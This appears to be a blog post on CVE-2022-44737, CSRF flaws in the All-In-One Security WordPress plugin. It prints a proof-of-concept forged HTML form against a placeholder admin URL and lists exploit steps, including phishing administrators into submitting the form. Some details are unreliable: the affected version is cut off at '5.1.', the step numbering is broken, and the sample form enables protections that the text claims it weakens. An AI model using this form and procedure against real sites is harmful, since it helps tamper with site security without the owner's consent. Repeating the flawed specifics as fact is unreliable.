All-In-One Security (AIOS) – Security and Firewall is a popular WordPress plugin designed to help administrators effortlessly manage the security of their websites. With over 900,000 active installations, AIOS offers protection against brute force attacks, file change monitoring, and other advanced security features. However, a recent investigation has revealed some troubling findings about this plugin.

The latest version of the AIOS plugin (up to version 5.1.) suffers from multiple Cross-Site Request Forgery (CSRF) vulnerabilities. These flaws allow a malicious third party to execute unauthorized actions that could potentially compromise a WordPress website's security. This blog post examines the CVE-2022-44737 vulnerability, provides code snippets to replicate the issue, and offers details on how to exploit it.

Original References

The CVE-2022-44737 vulnerability in the All-In-One Security (AIOS) plugin was first reported in the following sources:

1. CVE-2022-44737: National Vulnerability Database (NVD) - https://nvd.nist.gov/vuln/detail/CVE-2022-44737
2. WPScan Vulnerability Database - https://wpscan.com/vulnerability/cbf049ae-b38f-4289-8efc-4e44cde1cdc4

Vulnerability Details

The Cross-Site Request Forgery (CSRF) vulnerabilities affect several modules within AIOS, including the Brute Force Protection, IP Blacklisting, and File Change Monitoring modules. A lack of proper CSRF tokens or security nonces makes these modules susceptible to attacks.

For instance, an attacker can exploit these vulnerabilities to disable or reset security settings, deactivate AIOS protection features, or make administrative changes in a WordPress website without the website owner's consent or knowledge.

Code Snippet

To reproduce the CSRF vulnerability that affects the Brute Force Protection module, an attacker can craft a malicious HTML form that performs unauthorized changes to the AIOS plugin settings. Here is an example of such a form:

<!DOCTYPE html>
<html>
    <body>
        <h1>MALICIOUS FORM</h1>
        <form method="POST" action="https://target-wordpress-website.com/wp-admin/admin.php?page=aiowpsec">;
            <input type="hidden" name="aiowps_brute_force_attack_prevention" value="1" />
            <input type="hidden" name="aiowps_enable_brute_force_attack_prevention" value="1" />
            <input type="hidden" name="aiowps_enable_login_activity_log" value="1" />
            <!-- Add more malicious input fields here -->
            <input type="submit" value="Click me" />
        </form>
    </body>
</html>

When a logged-in WordPress administrator visits this malicious webpage and submits the form, the attacker can effectively modify AIOS settings in a way that weakens the site's security. Other CSRF vulnerabilities in the plugin can also be exploited by a similar approach.

Exploit Details

To exploit the CSRF vulnerabilities in the All-In-One Security (AIOS) plugin, an attacker must perform the following steps:

Identify a target website running a vulnerable version of the AIOS plugin (<= 5.1.).

2. Craft a malicious CSRF form that targets the desired vulnerable module (e.g., Brute Force Protection, IP Blacklisting, File Change Monitoring).

Host the malicious form on a website or deliver it through phishing emails or Internet forums.

4. Entice the target WordPress administrator to visit the malicious webpage or submit the forged request while logged in.
5. Without the administrator's knowledge, the attacker's desired changes are carried out and the attack is successful.

Recommendation

To protect your WordPress website from CSRF vulnerabilities in the All-In-One Security (AIOS) plugin, update the plugin to the latest version immediately. WordPress administrators should always be wary of suspicious links and ensure that they use a reliable security plugin to shield their websites from potential threats.

Conclusion

The CVE-2022-44737 vulnerability reveals the risk posed by multiple Cross-Site Request Forgery vulnerabilities in popular security plugins like All-In-One Security (AIOS). These vulnerabilities can compromise the security of WordPress websites, putting sensitive data and user privacy at risk. Always maintain the latest version of the software and plugins to safeguard your site from such threats.

Timeline

Published on: 11/22/2022 16:15:00 UTC
Last modified on: 11/28/2022 15:05:00 UTC